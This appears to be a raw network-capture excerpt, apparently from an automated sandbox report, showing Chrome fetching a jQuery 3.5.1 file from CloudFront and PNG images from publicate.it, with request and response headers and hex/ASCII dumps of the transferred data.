                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 9f d4 d4 d4 f4 47 90 75 6f a5 1c 1c d8 cf fd fe 30 2b a3 9b 4c 26 3b 6c 7a 19 59 74 01 f4 5d 0d f5 65 2e 8f db 94 92 73 93 c5 03 fe 65 5d 5d dd 76 b5 2b 68 87 fd b6 40 75 20 a9 13 61 d5 38 06 3a 7b 87 d9 51 29 d8 74 ad fe 50 11 33 e9 ac f2 5a 5d 59 5d 01 05 2f 68 77 92 73 24 6a 8a 43 5d b0 9a 29 b3 2e 95 4b 64 bc 2e a4 84 63 4f a0 df 2e 18 1c 2d 18 d4 e6 87 9c 52 2e cb 39 a7 f9 2f 95 76 30 66 08 69 b4 83 25 da 90 53 70 f1 79 e7 68 41 4c e7 9c d2 f6 c9 79 9e 37 8c 2a a3 5d 83 9a 91 41 65 c2 17 d2 cc 39 c9 ab ef 9a 2a ee c5 16 6a 46 df 88 36 16 d0 4e dd bb b6 6b d7 ee b3 d9 00 fd ed 5d 22 e6 eb 8a 6d d9 d9 39 1d af 3b 91 0c 62 29 e2 4c 49 4f 55 6e 89 46 83 b0 8d 72 3e 29 78 53 d5 d6 3b 95 18 54 00 00 20 00 49 44 41 54 54 62 46 8c 0d 1a 76 e0 4a 22 87 74 53
                                                                                                                                                                                                        Data Ascii: Guo0+L&;lzYt]e.se]]v+h@u a8:{Q)tP3Z]Y]/hws$jC]).Kd.cO.-R.9/v0fi%SpyhALy7*]Ae9*jF6Nk]"m9;b)LIOUnFr>)xS;T IDATTbFvJ"tS
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: ee e1 b3 c8 36 2b e9 35 36 bf d5 1d ec f7 47 be b4 7e 00 7a 24 e9 76 b3 83 ec 34 39 72 ee 49 5b d9 f6 86 8e 86 06 38 65 61 b7 a7 aa 63 f7 ce d4 aa 83 a3 16 66 2f c6 95 62 f5 b8 d4 db eb a0 df 81 f9 ee b3 f0 de fd 16 96 68 83 b0 9b 83 35 88 d8 1a 1a ea ab bc 61 87 c9 41 2d 72 11 57 59 c7 d9 9d bb cf d6 6d 2f ab f1 5b ed 96 7d 07 66 66 96 97 0f 9f 99 98 58 5e 3e d6 32 51 a0 d7 16 cc 1c d2 ae 05 9d 58 17 f0 e5 d6 82 8e 07 c5 73 c8 c4 90 fc c8 29 f4 e5 75 09 25 94 b9 d1 37 9a df 77 5b a3 ef 92 f2 f2 3e cd 88 53 26 e3 0d d1 dc 90 c1 68 98 d2 f7 ca 79 5d af 76 2a 80 b2 97 2c 50 30 d8 95 c5 cb 0c 23 aa 98 8e e7 b3 ba 0a b4 7d 1c d7 35 aa 0a f9 a2 da 78 60 6a d4 c9 21 12 c8 8d 1a 8c bc 31 ab 6b b0 a0 97 de 69 bc 77 b7 a1 e1 ec bf 7f 55 45 74 d6 74 a4 95 f6 e7 28
                                                                                                                                                                                                        Data Ascii: 6+56G~z$v49rI[8eacf/bh5aA-rWYm/[}ffX^>2QXs)u%7w[>S&hy]v*,P0#}5x`j!1kiwUEtt(
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 12 18 8d 6b 33 73 69 47 4e 4c 30 48 65 8c 39 95 f3 8c a6 65 01 f4 86 1d 98 53 b0 49 ba d4 4d bf 1f 1d 67 85 66 31 46 27 68 a8 a6 2a c0 68 b1 58 c3 11 f8 f7 fd 98 36 61 8f b4 02 74 31 26 43 7e bd cc 15 41 c3 d3 69 46 86 b3 5a 23 36 24 6f 2e 12 15 c7 e6 41 06 06 f1 9f c9 61 0d 0f 85 ad b8 82 6a 5a 5d de 87 93 8f 31 88 64 78 76 7e fe 7a c7 ae 5d 7f dc 55 77 b1 a3 a3 ac 75 fe e1 e3 87 b3 d3 98 56 b2 b8 bc d8 b9 b0 78 e7 fc e2 c2 e2 c4 cc 4c 81 56 5b da 28 f6 bc b2 8e a6 d2 52 ea 5a af 16 45 5d 10 74 2a c2 68 a6 62 a8 aa 49 59 15 03 c0 0b 95 70 5e 76 5b 33 65 40 61 9c 08 f2 72 22 41 18 39 ba 35 82 cc 44 95 2a 8e e7 c1 5e 42 cd 4d 86 d7 82 69 45 ac 46 2a cc 00 64 a2 54 09 07 45 52 00 ef c5 75 40 73 0a 9e 05 11 f1 66 bf be 7b 8f 07 e8 1b 48 ba 18 bd 83 b1 09 0c
                                                                                                                                                                                                        Data Ascii: k3siGNL0He9eSIMgf1F'h*hX6at1&C~AiFZ#6$o.AajZ]1dxv~z]UwuVxLV[(RZE]t*hbIYp^v[3e@ar"A95D*^BMiEF*dTERu@sf{H


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        103192.168.2.54987852.222.232.474436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC416OUTGET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=5e9170ba37cf8dfae03ae1a4 HTTP/1.1
                                                                                                                                                                                                        Host: d3e54v103j8qbb.cloudfront.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC639INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                        Content-Length: 89476
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Access-Control-Allow-Methods: GET
                                                                                                                                                                                                        Access-Control-Max-Age: 3000
                                                                                                                                                                                                        Last-Modified: Mon, 20 Jul 2020 17:53:02 GMT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 04:03:49 GMT
                                                                                                                                                                                                        Cache-Control: max-age=84600, must-revalidate
                                                                                                                                                                                                        Etag: "dc5e7f18c8d36ac1d3d4753a87c98d0a"
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Via: 1.1 71c4b07776e0b6812900664940c9d7a6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Age: 43969
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA56-P4
                                                                                                                                                                                                        X-Amz-Cf-Id: XOz9VkXvi8R4eIaRkMG_dTGGvuH-ATCzSc879tVe0OqDm8I5kbQBKA==
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC15745INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                                                                                                                                                                                        Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 33 29 2c 6d 3d 22 6c 61 73 74 22 21 3d 3d 68 2e 73 6c 69 63 65 28 2d 34 29 2c 78 3d 22 6f 66 2d 74 79 70 65 22 3d 3d 3d 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 67 26 26 30 3d 3d 3d 76 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 3d 79 21 3d 3d 6d 3f 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 3a 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 63 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 79 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69
                                                                                                                                                                                                        Data Ascii: 3),m="last"!==h.slice(-4),x="of-type"===e;return 1===g&&0===v?function(e){return!!e.parentNode}:function(e,t,n){var r,i,o,a,s,u,l=y!==m?"nextSibling":"previousSibling",c=e.parentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(y){while(l){a=e;whi
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 6e 3d 46 2e 74 68 65 6e 2c 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 45 2e 72 65 61 64 79 53 74 61 74 65 7c 7c 22 6c 6f 61 64 69 6e 67 22 21 3d 3d 45 2e 72 65 61 64 79 53 74 61 74 65 26 26 21 45 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 6f 53 63 72 6f 6c 6c 3f 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 53 2e 72 65 61 64 79 29 3a 28 45 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 42 29 2c 43 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 42 29 29 3b 76 61 72 20 24 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 29 7b 76 61 72 20 73 3d 30 2c 75 3d 65 2e 6c 65 6e 67 74 68 2c 6c 3d 6e 75 6c 6c 3d 3d 6e 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d
                                                                                                                                                                                                        Data Ascii: n=F.then,"complete"===E.readyState||"loading"!==E.readyState&&!E.documentElement.doScroll?C.setTimeout(S.ready):(E.addEventListener("DOMContentLoaded",B),C.addEventListener("load",B));var $=function(e,t,n,r,i,o,a){var s=0,u=e.length,l=null==n;if("object"=
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 65 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3f 53 2e 5f 65 76 61 6c 55 72 6c 26 26 21 75 2e 6e 6f 4d 6f 64 75 6c 65 26 26 53 2e 5f 65 76 61 6c 55 72 6c 28 75 2e 73 72 63 2c 7b 6e 6f 6e 63 65 3a 75 2e 6e 6f 6e 63 65 7c 7c 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 7d 2c 6c 29 3a 62 28 75 2e 74 65 78 74 43 6f 6e 74 65 6e 74 2e 72 65 70 6c 61 63 65 28 6a 65 2c 22 22 29 2c 75 2c 6c 29 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 2c 69 3d 74 3f 53 2e 66 69 6c 74 65 72 28 74 2c 65 29 3a 65 2c 6f 3d 30 3b 6e 75 6c 6c 21 3d 28 72 3d 69 5b 6f 5d 29 3b 6f 2b 2b 29 6e 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 53 2e 63 6c 65 61 6e 44 61 74 61
                                                                                                                                                                                                        Data Ascii: e||"").toLowerCase()?S._evalUrl&&!u.noModule&&S._evalUrl(u.src,{nonce:u.nonce||u.getAttribute("nonce")},l):b(u.textContent.replace(je,""),u,l))}return n}function Re(e,t,n){for(var r,i=t?S.filter(t,e):e,o=0;null!=(r=i[o]);o++)n||1!==r.nodeType||S.cleanData
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 78 2e 73 70 65 65 64 73 3d 7b 73 6c 6f 77 3a 36 30 30 2c 66 61 73 74 3a 32 30 30 2c 5f 64 65 66 61 75 6c 74 3a 34 30 30 7d 2c 53 2e 66 6e 2e 64 65 6c 61 79 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 65 29 7b 72 65 74 75 72 6e 20 72 3d 53 2e 66 78 26 26 53 2e 66 78 2e 73 70 65 65 64 73 5b 72 5d 7c 7c 72 2c 65 3d 65 7c 7c 22 66 78 22 2c 74 68 69 73 2e 71 75 65 75 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 65 2c 72 29 3b 74 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 43 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 29 7d 7d 29 7d 2c 72 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 2c 69 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 65 6c 65 63 74
                                                                                                                                                                                                        Data Ascii: x.speeds={slow:600,fast:200,_default:400},S.fn.delay=function(r,e){return r=S.fx&&S.fx.speeds[r]||r,e=e||"fx",this.queue(e,function(e,t){var n=C.setTimeout(e,r);t.stop=function(){C.clearTimeout(n)}})},rt=E.createElement("input"),it=E.createElement("select
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC8195INData Raw: 72 61 70 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 61 72 65 6e 74 28 65 29 2e 6e 6f 74 28 22 62 6f 64 79 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 53 28 74 68 69 73 29 2e 72 65 70 6c 61 63 65 57 69 74 68 28 74 68 69 73 2e 63 68 69 6c 64 4e 6f 64 65 73 29 7d 29 2c 74 68 69 73 7d 7d 29 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 68 69 64 64 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 28 65 29 7d 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 2e 6f 66 66 73 65 74 57 69 64 74 68 7c 7c 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7c
                                                                                                                                                                                                        Data Ascii: rap:function(e){return this.parent(e).not("body").each(function(){S(this).replaceWith(this.childNodes)}),this}}),S.expr.pseudos.hidden=function(e){return!S.expr.pseudos.visible(e)},S.expr.pseudos.visible=function(e){return!!(e.offsetWidth||e.offsetHeight|


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        104192.168.2.549892104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1036OUTGET /images/template4-p-500.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC759INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:25 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 54335
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "d43f-620aa1d23442e"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wg6nG60nnDjjesu9%2FGN%2FhF%2FdMemvXGD5bx4t%2BLQWaMW3zbexAvZrSgyVhtt9%2BixjPWv%2F0WKIJYm9GagGr4haNbj9NOoI78VqaJAIUzH%2B1i2v%2BB%2BXWyFjSscMMuXN2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615cc2f117c82-EWR
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC610INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 02 62 08 03 00 00 00 06 df c0 7b 00 00 03 00 50 4c 54 45 4c 69 71 61 61 61 ff ff ff 1e 1e 1e 00 00 00 02 02 02 01 01 01 00 00 00 01 01 01 00 00 00 00 00 0e 3a 3c 4a 46 48 55 5a 5a 5a a2 a3 a6 ff ff ff fc fc ff f7 fd 53 fe fd ff ed f1 48 3d 1a 04 ff ff ff f8 f8 f8 c1 c1 c2 3b 3b 3e ff ff ff f3 f3 f3 4b 44 3b cb d0 4f fe fe fe f9 f9 f9 ec ec ed 60 5d 55 d8 d9 d9 cd ce cf 6f 67 4a e7 e8 e8 11 21 34 e8 e8 e8 2c 2d 3d b7 c2 bc c8 c0 b6 93 94 9b de df d8 ac b7 b4 da e6 e8 0f 11 23 0e 10 22 0e 10 23 f6 fd 20 f8 ff 1f ff ff ff 10 12 24 f9 ff 20 f6 ff 20 f5 fd 20 10 12 22 fb ff 20 0a 0c 22 0c 0e 22 0b 0d 1f 0d 0f 20 f8 ff 21 05 08 22 fd ff 20 04 06 19 f6 ff 21 f8 fd 20 07 09 1c f2 f2 f3 fd fd fd f4
                                                                                                                                                                                                        Data Ascii: PNGIHDRb{PLTELiqaaa:<JFHUZZZSH=;;>KD;O`]UogJ!4,-=#"# $ " "" !" !
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 76 96 98 9e 6e 72 25 d6 d5 d8 9d a2 25 5e 60 6c 8f 94 25 70 72 7c ab c9 cf 82 5f 44 20 23 35 63 65 70 b9 be 24 e0 e4 21 c9 ce 23 a8 bf c3 52 54 60 96 9b 24 71 79 84 40 42 50 d1 d6 23 3d 3f 4d 9b bb c2 8c 6a 4f fd fd f1 09 09 12 15 30 4f c1 c6 23 9e ac aa 94 74 59 d8 de 23 1c 55 83 c0 ba b4 68 7a 82 45 47 55 9b 7e 64 bb b1 a7 8f a2 a0 4a 2a 16 18 41 68 91 ac af 22 83 c3 ad 9a 87 b6 a8 9b a9 92 7d b1 a1 91 ac d2 eb 1d 35 38 49 9d d5 a8 b8 b7 1f 66 9b a2 86 6e e9 f2 f5 65 ac dc 5c 71 77 79 96 96 89 c0 e4 da ec f1 34 92 d1 a5 8c 75 3a 54 53 28 42 43 21 7c ba 4b 67 66 7c 7d 72 5e 52 46 45 89 ae f9 cd 00 6e 00 00 00 2e 74 52 4e 53 00 0c c0 0f 07 03 0b 02 04 01 fe fc fc 02 1a d4 c0 fb c0 fb fe ea 84 2c fc b5 70 fe fb a4 94 5e fd 46 3a fd 4c ff 3b fa e8 db c5 98
                                                                                                                                                                                                        Data Ascii: vnr%%^`l%pr|_D #5cep$!#RT`$qy@BP#=?MjO0O#tY#UhzEGU~dJ*Ah"}58Ifne\qwy4u:TS(BC!|Kgf|}r^RFEn.tRNS,p^F:L;
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: ef 9e 9c fb f7 1d df 5e 1f b5 e1 64 dc 83 3b bf bd e3 5f ed 6f 6c fb 71 9b 4f 96 be 0b 55 97 6f 1b aa 6e 82 8e 09 93 3b 1f dc f9 ad 1d ff 76 f0 d9 0d 0c fa 84 65 e2 2b 89 65 c2 b2 35 64 69 e6 ed b9 7f db f1 2d 0c fa 00 75 00 fd 41 0c fa 4f f7 9e d8 c8 55 d5 af 08 a2 d5 b2 45 64 69 e6 d9 c3 3f c5 a0 3f 78 13 e8 3b 31 e8 df 9f dd b8 a0 4f 58 be 92 aa 5b 2c d6 2d 82 fb d2 cc 87 18 f4 9d eb 40 c7 99 99 6f 7f 6b c7 8f f7 7d ba 71 41 b7 5a ad d6 a9 af 22 d6 2d 82 b9 c5 31 7b 62 ef 8f 77 7c eb db 38 3f 63 80 6e d0 a4 30 e8 0f ec fb de c6 05 dd 62 b1 ee ba f0 55 64 69 ab a0 ee 98 fd fe de 07 06 a0 9b aa 6e fa 71 9b 00 f4 cb 7f fe af 7b 97 6b bb dc 5b 0e 74 ec c9 19 f9 38 c8 c1 6e 0e d0 ff eb 89 7b 97 ff ba b0 e8 d8 72 a0 83 7d 1f 24 61 1f dc b9 f3 db 9b 03 f4 fd
                                                                                                                                                                                                        Data Ascii: ^d;_olqOUon;ve+e5di-uAOUEdi??x;1OX[,-@ok}qAZ"-1{bw|8?cn0bUdinq{k[t8n{r}$a
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 7d dc d2 6f 74 d9 06 fd 9e 29 d0 26 8b 66 13 c8 a6 07 fd de e5 cf 90 7b b7 6c 05 d9 dc a0 ef ba 7c e9 de e5 f2 ae 8d 5d 3b bb 77 d9 c4 a0 5b 2d 5f b5 6b d5 ba 39 ac f7 56 06 1d 6f c1 d6 7b 17 0b 14 58 2c 5b 41 36 35 e8 5f d5 58 5b 2d 5b 43 36 b9 79 ff 6a 62 d9 22 a8 6f 62 d0 b7 e5 cb 64 1b f4 2d 28 db a0 6f 41 d9 06 7d 0b ca 36 e8 5b 50 b6 41 df 82 b2 0d fa 16 94 7b 00 1d 86 a6 4e 40 21 79 6b a4 ab 36 b3 c0 60 4c eb c4 3d 80 be 7e 20 f0 16 49 5f 6c 6e 59 9a bd 33 e8 c7 66 26 26 ad 16 cb 6e 2c 63 af db d6 fa 8d 22 63 48 19 28 ee be 9b a6 ef fd df 99 df 3c f9 b8 63 cf 9e 3d 7b 26 27 26 8d 71 4b eb c0 df 46 ff 3e 95 71 ad 34 10 03 b6 d7 24 46 72 fe d0 ff bc 03 e8 ff f4 a7 1f 30 e7 73 91 77 62 7f f8 d5 ef 9f f9 e5 93 8f 1f da 6d 99 98 98 04 f9 92 a9 4b db 3b
                                                                                                                                                                                                        Data Ascii: }ot)&f{l|];w[-_k9Vo{X,[A65_X[-[C6yjb"obd-(oA}6[PA{N@!yk6`L=~ I_lnY3f&&n,c"cH(<c={&'&qKF>q4$Fr0swbmK;
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 19 89 65 83 0c ba 63 c8 b6 f7 7f 2b a5 bc 52 ca d5 62 4a 95 21 50 ad 9f cd c7 b3 0d 49 ad a6 2b fd 62 a7 cf a7 d6 f2 2b 0d 2d 5f a4 10 c1 b7 f2 ed 6a 5c 08 e5 ca 3d 86 b3 21 54 f3 79 3c 7e 12 56 de 48 f5 bd d8 0e b8 c0 12 19 96 7f da 17 0e 2c af 5e 64 3f cb bd 3a d0 fe c7 0f 01 fc 58 fb 07 a6 7f 43 5b fe 89 81 09 1f 9d 35 fe 4e 66 ca 0c ef d6 87 8c fc 68 0c 3c b3 e8 27 17 d5 e5 00 67 f8 e1 86 6b 66 2a 33 86 7d e4 90 3b fd 84 0d 85 a5 65 59 aa d9 5c 7e 31 59 ad 96 7d 4c 3b bb 12 ac 28 9d b0 8d a3 c5 55 9a 61 38 89 56 73 42 88 0e f3 b2 ca d4 08 9e a9 c9 42 8f b9 a3 a6 3f b0 ef ff 49 c7 bb a5 44 9f 6f 68 9d 1a 22 a2 15 65 a5 9f 68 4b dd 6c a2 4f 2e d4 08 a1 a2 b4 2b e9 7c 0f 5c 86 6e 76 2d 9b a8 04 8b 95 42 29 df 97 fc 62 a4 cc 53 2a af 06 0c b8 09 62 e0 f3
                                                                                                                                                                                                        Data Ascii: ec+RbJ!PI+b+-_j\=!Ty<~VH,^d?:XC[5Nfh<'gkf*3};eY\~1Y}L;(Ua8VsBB?IDoh"ehKlO.+|\nv-B)bS*b
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 25 85 6b 4c 5b a9 94 b4 66 88 4b 69 79 3e 5a 4a ac e8 49 a5 ad d2 8d 44 bc 91 88 2c a8 6d a5 5a 51 52 32 41 2c b3 21 29 a4 46 25 42 8c 0a 2c 1d 20 42 02 2b 23 2f e2 38 ae 56 33 52 fc a6 e1 1f ed 6b b0 00 bc 08 54 df ef 87 30 85 0b ac 7e 12 cd 99 d9 3e 48 f6 0d 7c 7e ac fd b7 2a e4 d7 24 13 eb 9f 8e d9 f0 49 b3 a0 09 49 b3 77 8c e0 3a 4c d9 fc 70 c2 58 af c1 0d bf 49 a7 61 81 23 af 1f be 11 81 b8 d0 2a 78 bd b6 5c 2b df e4 fd 54 37 a3 25 12 f5 6e b1 9e 89 97 12 1d ce 56 9b 8e 66 b2 c9 5e 94 cb d5 13 f9 42 76 25 9c d4 f2 7c b1 50 28 8a f9 b5 18 9b 4f 2b 8a a6 c5 c3 e4 8a 56 a1 49 84 6c aa 20 07 64 36 da 8b b2 01 42 a5 79 55 14 43 81 30 0e ed 9d 36 ef 3d 57 d9 06 9b 8e 7f 9a 44 36 af 4c d3 b2 54 ec e4 c2 c5 76 3e e7 a1 08 f0 f4 48 d7 74 af 94 e8 a4 b4 ea 32
                                                                                                                                                                                                        Data Ascii: %kL[fKiy>ZJID,mZQR2A,!)F%B, B+#/8V3RkT0~>H|~*$IIw:LpXIa#*x\+T7%nVf^Bv%|P(O+VIl d6ByUC06=WD6LTv>Ht2
